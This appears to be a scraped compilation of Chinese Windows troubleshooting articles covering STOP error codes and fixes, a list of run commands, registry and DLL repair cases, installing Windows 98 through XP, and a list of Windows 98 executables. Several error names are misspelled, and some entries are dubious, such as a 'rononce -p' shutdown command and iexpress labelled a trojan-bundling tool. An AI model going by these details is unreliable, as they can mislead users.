检查是否正确安装了所有新硬件或软件,如果这是一次全新安装,请与硬件或软件制造商联系,获得可能需要的任何Windows更新或驱动程序.

禁用或卸载所有的反病毒程序.

禁用BIOS内存选项,例如cache或shadow.

■.停止错误编号:0x00000077

说明文字：KERNEL-STEL-STACK-INPAGE-ERROR

通常的原因：无法从分页文件将内核数据所需的页面读取到内存中。

解决方法：使用反病毒软件的最新版本，检查计算机上是否有病毒。如果找到病毒，则执行必要的步骤把他从计算机上清除掉。请参阅制造商提供的所有系统诊断软件，尤其是内存检查。

禁用BIOS内存选项，例如cache,shadow.

■.停止错误编号：0x00000079

说明文字：MISMATCHED-HAL

通常的原因：硬件抽象层与内核或机器类型不匹配（通常发生在单处理器和多处理器配置文件混合在同一系统的情况下）。

解决方法：要解决本错误，可使用命令控制台替换计算机上错误的系统文件。

单处理器系统的内核文件是Ntoskml.exe，而多处理器系统的内核文件是Ntkrnlmp.exe，但是，这些文件要与安装媒体上的文件相对应；在安装完Windows2000和，不论使用的是哪个原文件，都会被重命名为Ntoskrnl.exe文件。HAL文件在安装之后也使用名称Hal.dll但是在安装媒体，但是在安装媒体上却有若干个可能的HAL文件。

■.停止错误编号：0x0000007A

说明文字：KERNEL-DATA-INPAGE-ERROR

通常的原因：无法从分页文件将内核数据所需的页面读取到内存中。（通常是由于分页文件上的故障，病毒，磁盘控制器错误或由故障的RAM引起的）。

解决方法：使用反病毒软件的最新版本，检查计算机上是否存在病毒。如果找到病毒。则执行必要的步骤把他从计算机上清除掉，请参阅犯病度软件文档了解如何执行这些步骤。

如果计算机已使用NTFS文件系统格式化。可重新启动计算机，然后在该系统分区上运行Chkdsk

/f/r命令。如果由于错误而无法启动命令，那么使用命令控制台，并运行Chkdsk /r命令。

运行由计算机制造商提供的所有的系统在很端软件，尤其是内存检查。

■.停止错误编号：0xC000021A

说明文字：STATUS-SYSTEM-PROCESS-TERMINATED

通常的原因：用户模式子系统，例如Winlogon或客户服务器运行时子系统（CSRSS）已被损坏，所以无法再保证安全性。

解决方法：卸掉所有新近安装的硬件。

如果无法登陆，则重新启动计算机。当出现可用的作系统列表时按F8。在Windows2000高级选项菜单屏幕上，选择：“最后一次正确的配置”。然后按会车。

运行故障恢复台，并允许系统修复任何检测到的错误。

■.停止错误编号：0xC0000221

说明文字：STATUS-IMAGE-CHECKISU7M-MISMATCH

通常的原因：驱动程序或系统DLL已经被损坏。

解决方法：运行故障复控台，并且允许系统修复任何检测到的错误。

如果在RAM添加到计算机之后，立即发生错误，那么可能是分页文件损坏，或者新RAM由故障或不兼容。删除Pagefile.sys并将系统返回到原来的RAM配置。

运行由计算机制造商提供的所有的系统诊断软件，尤其是内存检查。
有零工作室　www.you0.com www.you0.net联系QQ 3149886


Windows常用命令集

《一键清理系统垃圾》

Windows常用命令集

winver－－－－－－－－－检查windows版本
wmimgmt.msc－－－－打开windows管理体系结构(wmi)
wupdmgr－－－－－－－－windows更新程序
w脚本－－－－－－－－windows脚本宿主设置
write－－－－－－－－－－写字板
winmsd－－－－－－－－－系统信息
wiaacmgr－－－－－－－扫描仪和照相机向导
winchat－－－－－－－－xp自带局域网聊天

mem.exe－－－－－－－－显示内存使用情况
msconfig-----------启动
msconfig.exe－－－系统配置实用程序
mplayer2－－－－－－－简易widnows media player
mspaint－－－－－－－－画图板
mstsc－－－－－－－－－－远程桌面连接
mplayer2－－－－－－－媒体播放机
magnify－－－－－－－－放大镜实用程序
mmc－－－－－－－－－－－－打开控制台
mobsync－－－－－－－－同步命令

dxdiag－－－－－－－－－检查directx信息
drwtsn32－－－－－－ 系统医生
devmgmt.msc－－－ 设备管理器
dfrg.msc－－－－－－－磁盘碎片整理程序
diskmgmt.msc－－－磁盘管理实用程序
dcomcnfg－－－－－－－打开系统组件服务
ddeshare－－－－－－－打开dde共享设置
dvdplay－－－－－－－－dvd播放器

nslookup－－－－－－－ip地址侦测器
net stop messenger－－－－－停止信使服务
net start messenger－－－－开始信使服务
notepad－－－－－－－－打开记事本
nslookup－－－－－－－网络管理的工具向导
ntbackup－－－－－－－系统备份和还原
narrator－－－－－－－屏幕“讲述人”
ntmsmgr.msc－－－－移动存储管理器
ntmsoprq.msc－－－移动存储管理员操作请求
netstat －an－－－－(tc)命令检查接口

syncapp－－－－－－－－创建一个公文包
sysedit－－－－－－－－系统配置编辑器
sigverif－－－－－－－文件签名验证程序
sndrec32－－－－－－－录音机
shrpubw－－－－－－－－创建共享文件夹
secpol.msc－－－－－本地安全策略
syskey－－－－－－－－－系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
services.msc－－－本地服务设置
sndvol32－－－－－－－音量控制程序
sfc.exe－－－－－－－－系统文件检查器
sfc /scannow－－－windows文件保护(扫描错误并复原)

tsshutdn－－－－－－－60秒倒计时关机命令
tourstart－－－－－－xp简介（安装完成后出现的漫游xp程序）
taskmgr－－－－－－－－任务管理器 （2000／xp／2003）

eventvwr－－－－－－－事件查看器
eudcedit－－－－－－－造字程序
explorer－－－－－－－打开资源管理器

packager－－－－－－－对象包装程序
perfmon.msc－－－－计算机性能监测程序
progman－－－－－－－－程序管理器

regedit.exe－－－－注册表
rsop.msc－－－－－－－组策略结果集
regedt32－－－－－－－注册表编辑器
rononce －p －－－－15秒关机
regsvr32 /u *.dll－－－－停止dll文件运行
regsvr32 /u zipfldr.dll－－－－－－取消zip支持

cmd.exe－－－－－－－－cmd命令提示符
chkdsk.exe－－－－－chkdsk磁盘检查
certmgr.msc－－－－证书管理实用程序
calc－－－－－－－－－－－启动计算器
charmap－－－－－－－－启动字符映射表
cliconfg－－－－－－－sql server 客户端网络实用程序
clipbrd－－－－－－－－剪贴板查看器
conf－－－－－－－－－－－启动netmeeting
compmgmt.msc－－－计算机管理
cleanmgr－－－－－－－垃圾整理
ciadv.msc－－－－－－索引服务程序

osk－－－－－－－－－－－－打开屏幕键盘
odbcad32－－－－－－－odbc数据源管理器
oobe/msoobe /a－－－－检查xp是否激活

lusrmgr.msc－－－－本机用户和组
logoff－－－－－－－－－注销命令

iexpress－－－－－－－木马捆绑工具，系统自带

fsmgmt.msc－－－－－共享文件夹管理器

utilman－－－－－－－－辅助工具管理器

gpedit.msc－－－－－组策略


Windows出错信息不完全解析

《一键清理系统垃圾》

Windows出错信息不完全解析

     Windows的稳定性我们确实不敢恭维，当你用过一段时间后，系统变慢、出错是经常的事，有的时候还要出现死机（Windows最出名的“蓝屏”你应该听过吧）。不过话又说回来，虽然我们对它的不稳定一直颇有微辞，可是又不能不用，90%以上的个人用户应该都是在用Windows吧！
    所以如何避免Windows出错，以及出错之后如何补救就成了当务之急，“亡羊补牢、尤为未晚”，下边我们组织了各种各样的法门、绝招，以挽救Windows于危难之中……
    注册表错误
    Windows 9x/Me/NT/2000把系统的许多设置都组织起来，放到了注册表中，这样虽然易于管理一些（不用像在DOS和Windows 3.x时面对无穷的.ini文件）。可是同时也带来了这样的问题:如果哪个安装程序的反安装做得不好，很容易在注册表中留下一些垃圾。你留一些、我留一些，随着时间的流逝，安装/删除程序的增加，注册表的体积也在突飞猛进，系统当然也慢慢变慢;更有甚者，有些软件如果破坏了注册表，轻则使你不能使用部分软件，重则系统不能启动，惨……
    当你的系统启动很慢或者你安装/删除了很多软件时，你应该用注册表清理工具来清理一下注册表垃圾了，千万不要等到Windows告诉你“注册表错误” 之类的信息之后，你才手忙脚乱地到处打电话，请教朋友……
    Regclean
    发布公司:Microsoft
    最新版本:4.1a
    下载网址:http://support.microsoft.com/support/kb/articles/Q147/7/69.asp
    要说注册表清理工具，当然不能不提到微软自己出的RegClean。自家出的东西，当然兼容性、稳定性都会有不错的表现，而且还是免费的，不过功能稍嫌单薄，只能清理注册表中多余的注册表项，不能修复错误。
    案例:你用的是Win9x，某一天你发现了再也不能进入Windows，总是显示一些注册表错误之类的信息然后就死机或者重新启动，怎么办呢？
    解决方案:首先想到的第一招应该是——使用Windows注册表备份修复，方法嘛？很简单:
启动到DOS下，执行Scanreg /restore，在弹出的“Microsoft Registry Checker”窗口中，你可以看到五个文件，文件名分别为rb000.cab、rb002.cab……rb004.cab，找一个时间离现在最近的，选择“Restore”，系统应该可以正常启动了。如果还是不行，可以重新运行Scanreg，选择一个时间稍微再早一点的，再试……
    注意:现在市面上有很多注册表方面的书，通过修改注册表来提升系统性能和个性化设置更是大家都很熟悉的事情，可是要记得一点——备份，强烈建议你在每次修改注册表的时候都将你的注册表备份一次！
    动态链接库出错
    我们大家都知道，DLL是Windows中很重要的一种文件，不过微软开始采用这种动态链接库的时候却没有想到动态链接库也会有同名的时候，这些同名的文件可能是因为版本不同而内容不一样、也可能是完全不相干的两个（只不过名字相同），当同名的这些文件被覆盖之后，引起的后果就是灾难性——或者应用程序无法运行、或者程序老是出错，严重的系统根本无法启动。
    说到这里我们不能不提到VxD错误，VxD是虚拟设备，如果这些文件被替换的话，会导致和上边同样的灾难性后果。
    案例一:我每次启动计算机的时候，总是会出现如下的出错提示，但是按下回车键进入系统过后一切都可以使用，并且系统没有什么异常，这是什么原因？
    解决方案:看你的情形，应该不是因为缺少VxD文件所致，这种情况一般是因为不良的安装程序引起的，当你用它的反安装程序时，相应的文件虽然被删除了，但是却在注册表中留下了些残骸。
    运行注册表编辑器Regedit.exe打开注册表，按下“Ctrl+F”查找相应的文件名，找到以后将该注册表项删除，重新启动，问题应该解决了^_^。
    注意:其实上述情况的发生，还有更可能的一种原因——那就是你采用很强暴的方式删除应用程序（直接将应用程序安装目录删除）时也可能产生这种问题，强烈建议你采用应用程序自带的“反安装程序”来完成应用程序的反安装。
    案例二:在一次狂删软件中我卸载了某个软件，提示说还有c:\windows\system\WSock32.dll没删掉。重新启动后与上网有关的所有程序（IE、OE、Netants等）都无法运行，提示说:“系统出错，无法启动文件WSock32.dll。请检查文件，确定出问题的原因。”不知WSock32.dll是windows的什么重要文件，我该怎么解决？
    解决方案:这种问题是典型的Dll文件被覆盖所产生的，从IE、OE等出错，说明是系统文件遭到破坏引起的，同时你也知道了遭破坏的文件WSock32.dll，不妨从Windows安装盘释放一个WSock32.dll到提示目录即可（c:\windows\system\下），但是为了保险起见，最好先将原来的WSock32.dll备份。
注意:要覆盖文件，请一定注意Dll文件或者VxD文件的版本号要和你的Windows匹配，如果你不知道怎么才是匹配，请将你的Windows安装盘放入光驱，然后运行sfc.exe让Windows自动检测被破坏的系统文件吧！
    在Windows光盘上单击右键，选择“查找”，在弹出的“查找”窗口中，填写“包含文字”栏为需要查找的文件名（这里是WSock32.dll），按下“开始查找”，等光盘灯不亮的时候，可以看到在右边的查找到文件窗口中有一个Precopy2.cab（不同的Windows版本文件名也是不同的）。用Winzip将其中的WSock32.dll解压缩到需要的目录，至此大功告成（如果你没有Winzip，也可以使用Windows自带的Extract来释放文件，具体用法这里就不再赘述）。
    注意:Dll和VxD文件很容易出现被覆盖的现象，所以当安装应用程序的时候提示“xxxx 文件将被覆盖，是保留老版本文件还是替换”，你一定要谨慎行事，最好不要替换，这样可以保证已经安装的软件和系统的正常运行。
    程序失去反应
    身在Windows下，某个应用程序失去反应可能是最常见的事情。如果不是在系统启动的时候某个程序失去了反应，你应该首先等待一下，一般会解决大部分问题（这主要是该应用程序正在忙于处理，来不及向系统发去的信号反应，等一段时间就是等应用程序处理完毕，你也不要太性急了……）;还是不行的话，建议你启动一下计算机——Windows过一段时间要重新启动早已经是解决Windows问题屡试不爽的妙诀了……
    不过，要是你在安装某个应用程序、新加设备，而且重新启动之后却发现应用程序失去发应，只怕事情就不是那么简单的了。
    案例:最近，我的电脑遇到了问题，每次一开机，刚刚出现桌面背景，连屏幕下的任务栏还没有就会出现一个对话框，左上角有“mprexe”字样，内容为“该程序执行了非法操作，即将关闭，请予供应商联系”有时点关闭后照样能正常启动，有时就停止不动只能重新启动。即使覆盖重装了Win98也不管用。
    解决方案:MPR出错一般是因为用户口令文件出错、服务冲突和正在用户配置文件、硬件冲突、硬件驱动程序出错等等。
    1.用户口令文件出错
    我们可以通过重建用户口令文件来纠正错误。按下“Win+F”打开查找窗口，在“文件名”栏中输入“*.pwl”，按下“开始查找”，在查找到的文件窗口中，将所有文件更名或者删除。重新启动Windows，在出现登录窗口时，重新输入用户名和口令就可以了……
    2.服务/应用程序冲突
    要解决服务和应用程序冲突，你需要以“安全模式”启动计算机。然后将刚才安装的应用程序反安装或者服务禁用，看看是否可以解决问题。
    3.用户配置文件问题
    这可以通过禁止用户配置文件来解决此类错误。
在“网上邻居”上单击“右键”，选择“属性”，在“访问控制”中选择“共享级访问控制”，确定退出后重新启动。
    4.硬件冲突
    你可以在设备管理器中通过将有问题的硬件禁用来找到硬件冲突。
    打开“控制面板”/“系统”/“设备管理器”，在有黄色惊叹号（或问号）的设备上双击，选择“该设备在当前配置文件中禁用”，重复上述步骤可以找到真正有冲突的硬件，请更换它。
    5.设备驱动程序损坏
    请重新安装该设备的驱动程序。
    注:MPrexe失去反应可能是我们最常遇到的程序失去反应案例，这种案例的情形十分复杂，上述并不能完全包括，如果你的英文够好，请参阅微软的MPrexe问题详尽介绍:http://support.microsoft. com/support/kb/articles/Q178/0/84.asp。
    Windows NT/2000一般错误
    Windows NT/2000是Windows系列的服务器家族重要成员，稳定性比Win9x有了很大的改进，不过他也并不是不会出错，好在是WinNT/2000的出错信息有详细的记录，我们可以通过“事件查看器”来找到出问题的原因进而找出解决方案。
    我们这里说的一般错误，是指的Windows NT/2000还可以运行，不过会弹出出错信息，那种导致直接当机的问题请参看“Windows NT/2000 STOP错误”。
    案例:我启动Win2000的时候，弹出一个错误窗口“At least one service or driver failed during system startup. Use Event Viewer to examine the event log for details”，请问这种问题该如何解决？
    解决方案:很简单，Windows不是提醒你用“Event Viewer（事件查看器）”来了解一下详情吗？
打开“事件查看器”，在下图的窗口中，我们可以看到一个前面标有“×”的错误信息，双击查看该出错信息的详细出错信息。
    在弹出的出错信息描述中，我们可以看到是这样描述的“The messenger service terminated with service-specific error 2270.”，记下出错信息2270，现在打开一个命令行窗口，输入“net helpmsg 2270”，现在你应该看到出错信息了。
    “The computer name could not be added as a message alias. The name may already exist on the network. ”
    这说明现在这台电脑的Message Alias（消息别名）已经在网络上注册了（你将收不到用net send MessageAlias Message发过来的短信息了），请另外给本台电脑命名就可以了。
    Windows NT/2000 STOP错误
    Stop错误是Windows NT/2000系列特有的一种错误，和Windows NT/2000普通错误不同的是——出现了该种错误以后，如果电脑继续执行下去，可能会破坏数据，因此Windows NT/2000会显示一条STOP:0x0000000A之类的错误，然后蓝屏，停机……
    案例:我用的是Win2000，可是有一天启动的时候却突然出现了如下图的“STOP:0x0000007B”的蓝屏，然后计算机就停止了反应，请问我该怎么解决这种问题？
    解决方案:碰到这种问题，一般可以按照以下方式解决。
    1.首先使用新版杀毒软件检查计算机上是否有病毒。
    2.如果Windows NT/2000仍然可以启动，请检查“事件查看器”中的信息，以确定导致故障的设备或驱动程序。具体解决步骤请参考上边“Windows NT/2000一般错误”。
    3.如果不能启动计算机，试着用“安全模式”或“最后一次正确的配置”启动计算机，然后删除或禁用新安装的附加程序或驱动程序。如果用“安全模式”启动不了计算机，可以考虑使用修复控制台，修复控制台可以在Console模式下禁用一些服务、重新命名设备驱动程序、检修引导扇区或主引导记录（详细步骤请参考相应资料，这个需要比较专业的知识，这里不便详述）。
    4.拆下新安装的硬件设备（RAM、适配卡、硬盘、调制解调器等等），看看是否可以正常启动（如果你新安装了硬盘导致盘符错位，可是会引起上述问题的）。
    5.确保已经更新了硬件设备的驱动程序，以及系统有最新的BIOS。
    6.运行由计算机制造商提供的系统诊断工具，尤其是内存检查。
    7.检查Microsoft兼容硬件列表（HCL），确保所有的硬件和驱动程序都与Windows 2000兼容。Hcl.txt在Windows 2000 CD-ROM的\Support文件夹中，你也可以到微软的网站查看http://www. microsoft.com/hcl/default.asp。
    8.在BIOS中禁用内存缓存。
    9.重新启动计算机，在启动菜单处，按F8进入“高级启动选项”，选择“最后一次正确的配置”。（注:使用“最后一次正确的配置”的方式启动计算机后，计算机的所有设置被重置为最后一次正确启动时的配置。)
    10.如果能够访问Web，请进入http://www.microsoft.com/，单击“Support”/“Search Microsoft.com”，在“Search for:”处，输入“stop”和相应的号码（如出现STOP消息“stop:0x0000007B”，可在此输入“stop:0x0000007B”），按Enter键，（上接70页）
就可以找出所出现的STOP问题的解决方法。
    注:其实上边的Windows NT/2000一般问题的解决也可以在微软的站点上查找到详尽的帮助信息，出问题的时候你直接的想法应该是去看看微软的技术支持站点——看看他是怎么说的（上边的STOP:0x0000007B错误经查，原来是服务器上新添加了硬盘，但是没有注意到磁盘的主从顺序导致的）。
    Windows的出错信息是难以穷尽的，我上边所列的Windows错误可能也只是管中窥豹，不过我们的用意也不在于要将所有的出错信息列举出来，只是想通过这样的介绍给你一种解决问题的思路，使你在Windows出错的时候不至于手忙脚乱……


巧妙安装各种Windows操作系统

《一键清理系统垃圾》

巧妙安装各种Windows操作系统

对于新购置的电脑，在完成对硬盘的分区、格式化操作以后，就需要进行Windows系统的安装了。下面就来介绍一下Windows各种版本的安装方法。

    安装Windows 98

    新安装Windows 98系统，可以使用Windows 98系统启动盘启动计算机，然后将Windows 98安装光盘放入光驱，在DOS提示符状态下，进入光盘所在驱动器，然后进入Windows 98安装目录，运行Setup命令即可开始安装Windows 98。

    在开始安装时，安装程序会自动调用Scandisk程序对电脑系统进行检测，检测通过后即进入Windows 98安装程序。当屏幕上出现“软件许可协议”对话框时，单击选中“接受协议”选项并单击“下一步”按钮，这时会要求你输入“产品密钥”，也就是我们常说的Windows 98安装序列号，完成后单击“下一步”按钮进行安装。

    Windows 98安装程序进入“正在收集计算机的相关信息”界面，并对系统进行检查，以确保有足够的硬盘空间来安装Windows 98。完成后，即可按照提示，单击“下一步”按钮，选择“典型安装”方式，输入用户名和单位名称后，进入用户区域选择窗口，区域的选择主要是确定操作系统的系统时间以及日期，可以在列表中选择“中国”，然后单击“下一步”按钮。

    在安装过程中，安装程序会询问用户是否创建启动盘，如果你还没有自己的Windows 98启动盘，那么建议选择“确定”按钮创建，否则单击“取消”按钮。在接下来的过程中，就不必我们为之操心了，安装程序会向硬盘拷贝数据，并完成最后的安装过程。文件复制结束后，会提示重新启动计算机，重启后，即可直接进入Windows 98安装程序，并在左侧显示安装剩余时间，耐心地等待过后，你就会发现，Windows 98已经被安装到系统中了。

    小技巧：

    往往我们在安装Windows 98时，通常会在命令行状态下输入Setup命令进行安装，然后运行Scandisk、扫描磁盘、制作启动盘、安装版本说明等过程，如果打算要Windows快些安装，可以在使用Setup命令的时候，使用一些参数，从而达到快速安装Windows 98的目的。Setup的参数主要包括以下几个参数：

    /t:tmp：指定存放临时文件的目录

    /id：跳过磁盘空间检查

    /ie：不制作启动盘

    /ih：不检查注册表

    /im：跳过内存检查

    /is：不执行磁盘扫描

    /iv：安装时不显示版本说明

    我们想快速安装Windows 98，就可以输入命令：setup /id/ie/ih/im/is/iv，这样安装程序就会直接进入文件复制过程，从而省下了大量的安装时间。

    安装Windows Me

    Windows Me的安装可分为升级安装和完全安装两种类型，Windows Me可以从Windows 95、Windows 98和Windows 98 SE上直接升级安装，但不能从Windows 3.x中升级。

    Windows Me提供了三种安装方式，一是使用启动盘启动计算机，并进入安装目录执行Setup程序，需要注意的是，在执行安装程序之前，需要首先运行和加载磁盘高速缓存程序Smartdrv.exe。第二种方式是使用Windows Me光盘启动，自动执行安装程序。第三种方式是，在当前的操作系统中运行Windows Me的安装程序，比如在Windows 98系统中直接运行安装程序。

    无论采用哪种安装方式，其操作过程基本都是一样的，与前面介绍的Windows 98安装程序类似。

    如果你的电脑主频低于150MHz，那么会出现“在计算机上无法安装Windows，因为处理器低于150MHz，单击‘确定’退出安装程序”的提示，这时不要着急，可以输入命令：setup/nm即可开始安装了。

    另外，Windows Me的安装程序也存在一些参数(同Windows 98)。

    安装Windows 2000和Windows XP

    Windows 2000系统的安装可以在DOS和Windows 9x系统下直接安装，在光驱中放入Windows 2000安装盘后，会自动运行Windows 2000安装程序。选择全新安装后，会要求输入产品序列号，然后即可开始复制安装文件并重新启动计算机。

    在重新启动后的界面中，按下回车键则可以开始安装Windows 2000，并进入安装目录选择窗口，同时选择需要安装的盘符。在接下来的窗口中，会要求选择文件系统的格式，为了可以高效发挥Windows 2000系统性能，建议选择“将磁盘分区转换为NTFS”，完成后按下回车键即可根据向导提示完成Windows 2000系统的安装了。

    Windows XP安装方式包括三种，分别是升级安装、双系统共存安装和全新安装。它的安装方法与Windwos 2000系统安装方法类似，这里就不多做介绍了。

    如果是在DOS方式下安装Windows 2000/XP系统，首先需要运行Smartdrv.exe命令，这样才能使安装程序可以快速地安装，否则等待的时间将是非常漫长的。

    首先，我们用Windows 98启动盘启动电脑进入DOS模式，再执行Smartdrv.exe(如果软盘里没有该文件，可以从Windows 98的安装目录下的Command目录中获取)即可载入。然后执行Windows 2000/XP安装光盘中的i386目录下的Winnt.exe文件，记住：这里不是执行Setup.exe，而是Winnt.exe。以后的操作就比较简单了。

    安装多个操作系统

    在电脑中同时安装Windows 98和Windows 2000系统，可以首先安装Windows 98，然后在Windows 98系统中运行Windows 2000安装程序，这样就可以在计算机启动界面出现多重启动菜单，移动上下光标键并回车后即可选择进入相应的系统了。如果你打算让Windows Me系统与Windows 2000共存，最简单的方法是先安装好Windows Me，然后用Windows 98启动盘或者从光盘启动，安装Windows 2000，安装时选择“全新安装”方式。

    如果你打算让Windows 98、Windows 2000和Windows XP共存，可以首先安装Windows 98，然后在Windows 98下安装Windows 2000系统，最后在Windows 2000下安装Windows XP系统，在完成安装后即可形成多重启动菜单了。


Windows系统非法操作详解

《一键清理系统垃圾》

Windows系统非法操作详解

    一般的“非法操作”有两个选项：“关闭”和“详细资料”。可是“详细资料”里面的内容大多数人都看不明白，只好草草的关闭了。现在不用怕了，我来给大家讲解一下非法作的每个详细资料的具体含义。
    1、停止错误编号：0x0000000A

    说明文字：IRQL-NOT-LESS-OR-EQUAL

    通常的原因：驱动程序使用了不正确的内存地址。

    解决方法：如果无法登陆，则重新启动计算机。当出现可用的作系统列表时，按F8键。在Windows高级选项菜单屏幕上，选择"最后一次正确的配置"，然后按回车键。

    检查是否正确安装了所有的新硬件或软件。如果这是一次全新安装，请与硬件或软件的制造商联系，获得可能需要的任何Windows更新或驱动程序。

    运行由计算机制造商提供的所有的系统诊断软件，尤其是内存检查。

    禁用或卸掉新近安装的硬件(RAM，适配器，硬盘，调制解调器等等)，驱动程序或软件。

    确保硬件设备驱动程序和系统BIOS都是最新的版本。

    确保制造商可帮助你是否具有最新版本，也可帮助你获得这些硬件。

    禁用 BIOS内存选项，例如cache或shadow。

    2、停止错误编号：0x0000001E

    说明文字：KMODE-EXPTION-NOT-HANDLED

    通常的原因：内核模式进程试图执行一个非法或未知的处理器指令。

    解决方法：确保有足够的空间，尤其是在执行一次新安装的时候。

    如果停止错误消息指出了某个特定的驱动程序，那么禁用他。如果无法启动计算机。应试着用安全模式启动，以便删除或禁用该驱动程序。

    如果有非Microsoft支持的视频驱动程序，尽量切换到标准的VGA驱动程序或Windows提供的适当驱动程序。

    禁用所有新近安装的驱动程序。

    确保有最新版本的系统BIOS。硬件制造商可帮助确定你是否具有最新版本，也可以帮助你获得他BIOS内存选项，例如cache，shadow。

    3、停止错误编号：0x00000023或0x00000024

    说明文字：FAT-FILE-SYSTEM或MTFS-FILE-SYSTEM

    通常原因：问题出现在Ntfs.sys(允许系统读写NTFS驱动器的驱动程序文件)内。

    解决方法：运行由计算机制造商提供的系统诊断软件，尤其是硬件诊断软件。

    禁用或卸载所有的反病毒软件，磁盘碎片整理程序或备份程序。

    通过在命令提示符下运行Chkdsk /f命令检查硬盘驱动器是否损坏，然后重新启动计算机

    4、停止编号：0x0000002E

    说明文字：ATA-BUS-ERROR

    通常的原因：系统内存奇偶校验出错，通常由硬件问题导致。

    解决方法：卸掉所有新近安装的硬件(RAM。适配器。硬盘。调制解调器等等)。

    运行由计算机制造商提供的系统诊断软件，尤其是硬件诊断软件。

    确保硬件设备驱动程序和系统BIOS都是最新版本。

    使用硬件供应商提供的系统诊断，运行内存检查来查找故障或不匹配的内存。

    禁用BIOS内存选项，例如cache或shadow。

    在启动后出现可用作系统列表时，按F8。在Windows高级选项菜单屏幕上，选择"启动VGA模式。然后按回车键。如果这样做还不能解决问题，可能需要更换不同的视频适配器列表，有关支持的视频适配器列表，请参阅硬件兼容性列表。

    5、停止编号：0x0000003F

    说明文字：NO-MOR-SYSTEM-PTES

    通常的原因：没有正确清理驱动程序。

    解决方法：禁用或卸载所有的反病毒软件，磁盘碎片处理程序或备份程序。

    6、停止错误编号：0x00000058

    说明文字：FTDISK-INTERN-ERROR

    通常的原因：容错集内的某个主驱动器发生故障。

    解决方法：使用Windows安装盘启动计算机，从镜象(第2)系统驱动器引导。有关如何编辑Boot.ini文件以指向镜象系统驱动器的指导，可在MIcrosoft支持服务Web站点搜索"Edit ARC path"。

    7、停止错误编号：0x0000007B

    说明文字：INACCESSI-BLE-BOOT-DEVICE

    通常原因：初始化I/O系统(通常是指引导设备或文件系统)失败。

    解决方法：引导扇区病毒通常会导致这种停止错误。是用反病毒软件的最新版本，检查计算机上是否有存在病毒。如果找到病毒，则必须执行必要的不找把他从计算机上清除掉，请参阅反病毒软件文档了解如何执行这些步骤。

    卸下所有新近安装的硬件(RAM，适配器，调制解调器等等)。

    核对MIcrosoft硬件兼容性列表以确保所有的硬件和驱动程序都与Windows兼容。

    如果使用的适SCSI适配器，可以从硬件供应商除获得最新WINDOWS驱动程序，禁用SCSI设备的同步协商，检查该SCSI链是否终结，并核对这些设备的SCSI ID，如果无法确定如何执行能够这些步骤，可参考硬件设备的文档。

    如果你用的是IDE设备，将板上的IDE端口定义为唯一的主端口。核对IDE设备的主/从/唯一设置。卸掉除硬盘之外的所有IDE设备。如果无法确认如何执行这些不找，可参考硬件文档。

    如果计算机已使用NTFS文件系统格式化，可重新启动计算机，然后在该系统分区上运行Chkdsk /f/r命令。如果由于错误而无法启动系统，那么使用命令控制台，并运行Chkdsk /r命令。

    运行Chkdsk /f命令以确定文件系统是否损坏。如果Windows不能运行Chkdsk命令，将驱动器移动到其他运行Windows的计算机上，然后从这台计算机上对该驱动器运行Chkdsk命令。


windows下的EXE文件大揭密

《一键清理系统垃圾》

windows下的EXE文件大揭密

当我们安装完Windows后，其中的文件到底是执行何种任务？某特定任务又由哪个文件来执行呢？ 还有，从“开始”——“程序”——再点击“我所要执行的任务”，这种套数还真有点繁琐。 若是知道经常要执行的任务是哪个文件、位于何处？把它在桌面上建立一快捷方式，岂不省时 省力又方便！这就需要对Windows下的可执行文件明明白白。（注：若是以下所述的可执行文件 不在Windows安装目录下，可能是因为你没有安装，可到“控制面板”——“添加/删除程序” ——“Windows安装程序”，选取所要安装的组件。
本文假设Windows98安装在“C:\windows”下.
C:\Windows下的可执行文件
accstat.exe windows 辅助状态指示器
arp.exe tcp/ip地址转换协议命令
calc.exe 计算器应用软件
cdplayer.exe cd播放器附件
cleanmgr.exe 磁盘清理程序
clipbrd.exe 剪贴板查看应用程序
command.com ms－dos方式
control.exe 控制面板应用程序
cvt1.exe fat32转换器
defrag.exe 磁盘碎片整理应用程序
drvspace.exe 磁盘空间管理应用程序
dialer.exe 电话拨号程序
directcc.exe 直接电缆连接
explorer.exe 资源管理器
extrac32.exe windows cab 文件解压缩应用程序
fontview.exe 字体查看程序
filexfer.exe microsoft文件传输应用程序
finger.exe 用于获得来自于运行标准finger服务的任何系统的用户信息
freecell.exe 空当接龙游戏
grpconv.exe 程序组转换器
hostname.exe 返回tcp/ip配置窗口的dns标题头窗口中定义的计算机名字
ipconfig.exe 快速浏览系统tcp/ip配置应用程序
kodakprv.exe 映像预览应用程序
mplayer.exe 媒体播放机
mshearts.exe 红心大战游戏
nbtstat.exe 显示tcp/ip上的netbios（netbt）的状态
net.exe 一个非常全的网络配置、显示网络信息的命令,有详细帮助
netstat.exe 用于检查所有tcp、ip以及udp连接的统计情况
netdde.exe windows 网络dde（动态数据交换）
netwatch.exe 网络监视器
notepad.exe 记事本应用程序
packager.exe 对象包装应用程序
pbrush.exe 画笔应用程序
ping.exe 检测网络远端主机是否存在及判断网络是否正常的检测工具
progman.exe windows3.x中的程序管理器
qfecheck.exe 更新信息工具
regedit.exe 注册表编辑器
route.exe 用于管理本地tcp/ip路由表的应用程序
rsrcmtk.exe 显示资源状况
rundll32.exe 将dll作为应用程序运行
scandskw.exe 磁盘扫描应用程序
smartdrv.exe smartdrive（dos磁盘缓冲器）应用程序
sigverif.exe microsoft 签字应用程序
sndrec32.exe 录音机附件
sndvol32.exe 音量控制
sol.exe 纸牌游戏
sysmon.exe 系统监视器
taskman.exe 任务执行栏应用程序
taskmon.exe 任务监视器应用程序
telnet.exe 虚拟终端程序
tftp.exe 小文件传送协议，允许将文件传送给tftp服务器
tracert.exe 决定用户的系统与目标系统之间的路径
tuneup.exe windows 调整向导
vcmui.exe 版本冲突管理器
wangimg.exe 映像应用程序
welcome.exe 欢迎光临widows实用程序
winfile.exe windows3.x中的文件管理器
winhelp.exe 16位的windows 帮助程序
winhlp32.exe 32位的windows 帮助程序
wininit.exe windows 安装初始化应用程序
winipcfg.exe tcp/ip 配置实用程序
winmine.exe 扫雷游戏
winpopup.exe windows 弹出式消息实用程序
winver.exe 显示windows 版本号
write.exe 写字板附件
winrep.exe windows 报告工具
winalign.exe 排列本地文件应用程序
wupdmgr.exe windows 更新工具


Windows注册表详解

《一键清理系统垃圾》

Windows注册表详解

作者：骆诚

